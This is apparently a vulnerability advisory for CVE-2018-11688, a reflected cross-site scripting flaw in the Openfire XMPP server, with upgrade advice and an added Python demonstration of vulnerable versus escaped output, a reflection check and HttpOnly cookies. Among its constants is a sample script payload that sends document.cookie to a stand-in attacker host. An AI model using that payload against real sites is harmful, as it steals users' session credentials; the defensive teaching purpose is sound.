
CVE-2018-11688: Openfire Before 3.9.2 Allows Attackers to Steal User Credentials

GHSA-jphj-5g3m-w7x6 CVE-2018-11688
Summary

Openfire, a widely used XMPP chat server, has a reflected cross-site scripting (XSS) flaw in versions before 3.9.2. User-supplied input from a crafted URL is echoed into a page without proper validation or output encoding, so an attacker who gets a user to open that link can run script in the user's browser within the security context of the Openfire web site and read the victim's cookie-based authentication credentials, which is enough to hijack the session. If you run Openfire, upgrade to version 3.9.2 or later; that release fixes the issue.

What to do
  • Update the Maven artifact igniterealtime org.igniterealtime.openfire:parent to version 3.9.2 or later.
Affected software
Ecosystem: maven
Vendor: igniterealtime
Product: org.igniterealtime.openfire:parent
Affected versions: < 3.9.2
Fix: upgrade to 3.9.2
CPE entry: igniterealtime openfire 3.7.1
cpe:2.3:a:igniterealtime:openfire:3.7.1:*:*:*:*:*:*:*
Original description
Ignite Realtime Openfire before 3.9.2 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
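The description above is the textbook reflected XSS pattern (CWE-79): a parameter from the URL is written into the HTML response without encoding. The following is an added example, not Openfire's code and not the actual vulnerable page; the two handlers, the `q` parameter, the canary marker and the cookie name are constructed for illustration. It shows the vulnerable shape beside the hardened one, a reflection check of the kind a scanner or regression test would make, and the `HttpOnly` cookie attribute that limits what injected script can read (defence in depth, not a substitute for the upgrade).

```python
"""Reflected XSS: vulnerable handler, hardened handler, and a reflection check.

Added example. The handlers below are hypothetical stand-ins for a web page
that echoes a URL parameter; they are not Openfire's servlets or JSPs.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit


def _query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """CWE-79 pattern: the 'q' parameter is written into HTML verbatim."""
    q = _query_param(url, "q")
    return f"<html><body><p>Results for: {q}</p></body></html>"


def render_fixed(url: str) -> str:
    """Same page with HTML entity encoding applied at the output sink.

    escape() turns < > & " ' into entities, so attacker-controlled text can
    no longer open a tag or break out of an attribute.
    """
    q = _query_param(url, "q")
    return f"<html><body><p>Results for: {escape(q, quote=True)}</p></body></html>"


# Constructed canary: harmless markup that is only meaningful if reflected raw.
CANARY = "<xss-canary-7f3a>"

# Illustrative cookie-theft payload of the kind the advisory alludes to
# (script running in the site's origin exfiltrating document.cookie).
COOKIE_THEFT = "<script>new Image().src='https://attacker.invalid/?c='+document.cookie</script>"


def reflects_unescaped(render, base_url: str, marker: str = CANARY) -> bool:
    """True if `marker` comes back from the page as raw markup.

    Builds the crafted URL the way an attacker would (URL-encoded in the
    query string) and checks the response body for the unencoded marker.
    """
    crafted = f"{base_url}?q={quote(marker, safe='')}"
    return marker in render(crafted)


def session_cookie(value: str) -> str:
    """Set-Cookie header for the session id.

    HttpOnly keeps the value out of document.cookie, so even a successful
    injection cannot simply read it; Secure and SameSite narrow exposure
    further. This reduces the impact of XSS but does not fix the injection.
    """
    return f"Set-Cookie: JSESSIONID={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    base = "https://chat.example.invalid/search"
    print("vulnerable reflects canary :", reflects_unescaped(render_vulnerable, base))
    print("fixed reflects canary      :", reflects_unescaped(render_fixed, base))
    print("vulnerable reflects payload:", reflects_unescaped(render_vulnerable, base, COOKIE_THEFT))
    print(session_cookie("opaque-session-id"))
```

Run it as a script to see the vulnerable handler reflect both the canary and the cookie-theft payload while the fixed handler reflects neither. The same `reflects_unescaped` check, pointed at a real HTTP client instead of an in-process handler, is how you would confirm that an Openfire instance has actually been upgraded rather than trusting the reported version string alone.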
Source: GHSA · CVSS 3.1 base score: 6.1
Vulnerability type
CWE-79 Cross-site Scripting (XSS)
Published: 13 Jun 2018 · Updated: 15 Jun 2026 · First seen: 6 Mar 2026